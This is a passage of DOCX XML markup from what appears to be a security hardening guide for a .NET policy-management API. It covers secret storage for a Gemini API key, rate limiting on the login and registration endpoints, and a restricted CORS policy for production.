      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "Audience": "PolicyManagerClient",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "ExpirationInMinutes": "60"</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — Program.cs (Add Secret Provider)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">var builder = WebApplication.CreateBuilder(args);</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Development: use User Secrets (dotnet user-secrets set "GeminiApi:ApiKey" "AIza...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (builder.Environment.IsDevelopment())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    builder.Configuration.AddUserSecrets&lt;Program&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Production: use environment variables (GeminiApi__ApiKey=AIza...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Set in Docker Compose, Azure App Service, or system environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Configuration.AddEnvironmentVariables();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec1-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2  Rate Limiting on Authentication Endpoints</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The /api/auth/login endpoint has no brute-force protection. An attacker can make unlimited login attempts to enumerate passwords. The /api/auth/register endpoint similarly has no throttle, enabling account spam.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E11D48" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="FFF1F2" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: HIGH — Without rate limiting, a dictionary attack on admin accounts is trivial. Default credential pairs (admin/admin123) can be tested in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Package to Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add package AspNetCoreRateLimit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — Program.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddMemoryCache();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.Configure&lt;IpRateLimitOptions&gt;(options =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.EnableEndpointRateLimiting = true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.StackBlockedRequests = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.HttpStatusCode = 429;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.RealIpHeader = "X-Real-IP";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.GeneralRules = new List&lt;RateLimitRule&gt;</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new RateLimitRule</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Endpoint = "POST:/api/auth/login",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Period = "1m",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Limit = 5,          // 5 login attempts per minute per IP</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new RateLimitRule</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Endpoint = "POST:/api/auth/register",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Period = "1h",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Limit = 3,          // 3 registrations per hour per IP</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddSingleton&lt;IIpPolicyStore, MemoryCacheIpPolicyStore&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddSingleton&lt;IRateLimitCounterStore, MemoryCacheRateLimitCounterStore&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddSingleton&lt;IIpRateLimitProcessor, IpRateLimitProcessor&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddSingleton&lt;IRateLimitConfiguration, RateLimitConfiguration&gt;();</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In middleware pipeline (before UseRouting):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">app.UseIpRateLimiting();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec1-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3  CORS Restriction for Production</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The current CORS policy allows any origin with credentials. In production, this means any website can make authenticated API calls on behalf of a logged-in user, enabling Cross-Site Request Forgery attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — Program.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">builder.Services.AddCors(options =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    options.AddPolicy("DevelopmentCors", policy =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        policy.WithOrigins("http://localhost:4200")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowAnyMethod()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowAnyHeader()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowCredentials());</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options.AddPolicy("ProductionCors", policy =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        policy.WithOrigins(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                "https://policymanager.yourdomain.com",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                "https://app.policymanager.in")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowAnyMethod()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              .AllowAnyHeader()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
